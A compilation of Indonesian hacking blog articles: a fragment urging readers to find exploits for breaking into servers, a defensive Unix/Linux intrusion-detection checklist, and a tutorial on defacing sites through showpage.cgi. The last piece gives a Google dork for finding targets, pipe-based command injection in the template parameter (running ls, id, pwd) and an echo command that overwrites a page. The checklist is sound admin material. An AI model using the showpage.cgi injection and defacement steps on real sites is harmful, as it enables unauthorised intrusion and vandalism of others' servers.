server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehhe udah dulu yah...BUBAYYYYYY!!!!!!!!!!!!

Deteksi Penyusupan Terhadap System

Deteksi Penyusupan Mencari tanda-tanda terjadinya penyusupan terhadap sistem ########################################################### NOTE : 1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa saja yang ingin mengembangkan pengetahuan tentang security 2. Gunakan Tutor ini jika anda anggap penting untuk mengamankan server anda Sering Sekali lamer-lamer mendekteksi jaringan kita baik dengan beraneka ragam cara yang terkadang membuat si admin kebingunggan (panic) untuk melacaknya, untuk itu penulis mencoba memaparkan sekilas tentang langkah-langkah melakukan pendeteksian terhadap sistem yang susah tersusup atau belom tersusup, Benarkan sistem kita tersusup ? (khususnya pada sistem yang berbasix unix ato linux) sebagai jaringan yang paling banyak dipakai saat ini. Ada pun langkah-langka yang dapat kita tempuh adalah sebagai berikut : 1. memeriksa file-file log, untuk memcari koneksi dari lokasi yang tidak wajar atau mencari aktivitas yang tidak semestinya ada. sebagai contoh , periksalah "last log", proses accounting, semua log yang dibuat oleh syslog, dan log-log yang lain yang ada kaitannya dengan keamaan. bila firewall digunakan atau router menulis log ke lokasi yang berbede dengan compromised system (sistem yang berhasil di-comprimise), jangan lupa untuk memeriks log-lognya juga. sebagai catatan, hal ini bukanlah hal yang mudah dan aman untuk dilakukan, kecuali anda melakukan log ke sebuah media yang hanya dapat diisi dengan mode append (sering sekali penyusup mengedit file-file log untuk menyembunyikan aktivitas mereka). 2. memeriksa file-file setuid dan setgid (terutama file setuid root) pada sistem. sering sekali penyusup meninggalkan setuid dari /bin/sh atu /bin/time untuk memudahkan bila akan melakukan akses sebagai root di waktu yang akan datang. perintah find pada unix ato linux dapat digunakan untuk mencari file-file setuid dan segid. sebagai contoh ada dapat melakukan perintah berikut untuk mencari file-file setuid root dan setgid kmem pada seluruh lokasi didalam sistem : contoh pemakaian: gayo:~$ find / -user root -perm -4000 -print gayo:~$ find / -group kmem -perm -2000 -print keterangan : contoh ini akan mencari ke seluruh sistem / direktory, termasuk NFS/AFS yang dimount ke dalam file system, namun untuk mencegah hirarki tersebut ada beberapa perintah find yang mendukung option "-xdev" . sebagai contoh : gayo:~$ find / -user root -perm -4000 -print -xdev cara lain untuk mencari file-file setuid adalah dengan melakukan perintah ncheck pada tiap-tiap partisi.sebagai contoh, gunakan perintah berikut ini untuk mencari file-file setuid dan device -device khusus pada partisi /dev/rsd0g: gayo:~$ ncheck -s /dev/rsd0g 3. memeriksa file-file binary di dalam system untuk memastikan file-file binary tersebut tidak berubah. seringkali penyusup mengubah program pada sistem unix ato linux, misalkannya login, su, nestat, ifconfig, ls, find, du, df, libc, sync. semua file-file binary yang di referensikan oleh /etc/inetd.conf, dan program-program jaringan yang penting berserta library-library berbentuk objek yang dipakainya. jangan lupa untuk membandingan dengan file-file aslinya, hati-hati terhadap backupan jangan-jangan sudah terkena/terinfeksi trojan horse. ( pakailah program untuk menditeksi trojan ) contoh-contoh programnya cmp ato MD5 (program standar yang dimiliki unix ato linux) ato bisa saja anda mengunakan program lain yang bisa anda dapat kan di internet. 4. memeriksa sistem dari akses penggunaan program networking secara ilegal, yang umum disebut dengan packet sniffer. penyusup mungkin menggunakan sniffer untuk menyadap user account dan password : saran penulis gunakanlah :superscan ato sejenisnya.. 5. memeriksa semua file yang dijalankan oleh cron dan at. seringkali penyusup sengaja meninggalkan pintu belakang (backdoor) pada sistem (bahkan setelah sistem merasa yakin telah menyelesaikan masalah yang terjadi karena sistem di -compromise). Periksa juga semua program/file yang direferensi (baik secara langsung maupun tidak langsung) oleh job-job cron dan at serta file-file job mereka sendiri, yang seharusnya tidak dapat ditulis secara bebas. 6. Memeriksa service-service ilegal (yang sedang berjalan). perhatikan apakah ada penambahan atau pengubahan secara ilegal pada /etc/inetd.conf, khususnya periksa entri-entri yang mengeksekusi program-program shell (misal nya /bin/sh ato /bin/csh) dan pastikan program-program yang dispefisikasikan di /etc/inetd sudah benar dan tidak diganti oleh trojan horse. periksa juga service-service legal yang diberi tanda komentar pada service-service tertentu (berarti menjalankan service tertentu), atau mengganti program inetd dengan sebuah program trojan horse. 7. Memeriksa file /etc/passwd pada sistem dan memeriksa juga modifikasi yang terjadi pada file tersebut, khususnya untuk pembuatan account baru, account tanpa password, atau penggubahan UID (terutama UID 0) pada account-account yang ada. 8. Periksa file-file konfigurasi sistem dan jaringan dari entri-entri ilegal, khususnya cari entri degnan tanda plus (+) dab bana host yang tidak diinginkan di file /etc/hosts.equiv ,/etc/hosts.lpd dan semua file-file .rhost (terutama root,uucp,ftp dan account sistem yang lain 0 pada sistem, File-file tersebut seharusnya tidak dapat ditulis secara bebas. cari file-file yang tidak wajar atau hidden pasa seluruh lokasi di sistem (file-file yang dijalankan menurut prioda waktu tertentu dan umumnya tidak dapat dilihat dengan mengunakan perinah ls), karena file seperti ini dapat digunakan untuk menyembuyikan tool dan informasi (program password cracking, file password dari sistem lain). sebuah teknik yang umum pada sistem Unix ataupun linux adalah meletakan sebuah direktory yang hidden pada user acount dengan nama yang tidak wajar , misalkan ".." atau ".. "(titik2 spasi) atau "..^G" (titik2 ctrl+G). Sekali lagi, perintah find dapat digunakan untuk mencari file hidden tersebut, contoh : gayo:~$ find / -name ".. " - print -xdev gayo:~$ find / -name ".*" - print -xdev | cat -v demikian juga dengan file-file yang memiliki nama seperti misalnya "xx" dan ".mail" (terlihat seperti file biasa bukan) 9. memeriksa semua komputer pada jaringan lokal pada saat mencari tanda-tand adanya penyusupan. seringkali bila sebuah host berhasil di-compromise maka komputer lain yang berada didalam jaringan juga. hal ini bener khususnya bila jaringan menjalankan NIS (Network Information System) atau tiap-tiap host di dalam jaringan saling mempercayai melalui file .rhost dan file /etc/hosts.equiv. periksa juga host-host yang berbagi akses .rhost. S'moga dengan pelajaran yang kecil ini kita bisa belajar bersama!..bukankah hal-hal kecil merupakan musibah bagi hal-hal yang besar

Deface Show Page

Deface melalui showpage.cgi Tuesday, August 24, 2004- Jumlah Klik [4386] - Dari hasil percobaan saya yang dibantu dengan paman google. akhir nya saya dapat juga menemukan bug pada site yang menggunakan Showpage.cgi. ok kita langsung aje ye...... ------------------------------------------------------------------------------- Buka browser anda ke alamat: www.google.com lalu ketikkan keyword: allinurl: showpage.cgi?template= atau kalo kamu tahu keyword lain yang bagus silahkan kamu berkreasi dengan keyword-keyword kamu tersebut. oke.. sudah dapatkah target kita? klo sudah mari kita mulai. Caranya gampang buangat lho.. kamu tinggal berikan command shell seperti di linux.contohnya lagi nih ye.. misalnya http://www.target.nl/showpage.cgi?template=template5.html&tekst=1.txt nah kita tambahin aja.. menjadi: http://www.target.nl/showpage.cgi?template=template5.html|ls -la|&tekst=1.txt nah.. gampang bangat kan, nah kalau sudah begitu kita tinggal deface aje ok... kita lihat dulu uid nye apakah uid user. langkah pertama nye gini: http://www.target.nl/showpage.cgi?template=template5.html|id|&tekst=1.txt terus yang kedua nye : http://www.target.nl/showpage.cgi?template=template5.html|pwd|&tekst=1.txt maka akan muncul seperti ini :/home/arday/site90/web setelah muncul kaya gitu tinggal deface aja ketik: http://www.target.nl/showpage.cgi?template=template5.html|echo "Haloo arday " > arday.html|&tekst=1.txt Gimana Mudah bukan...............ok sampai disini dulu artikel saya...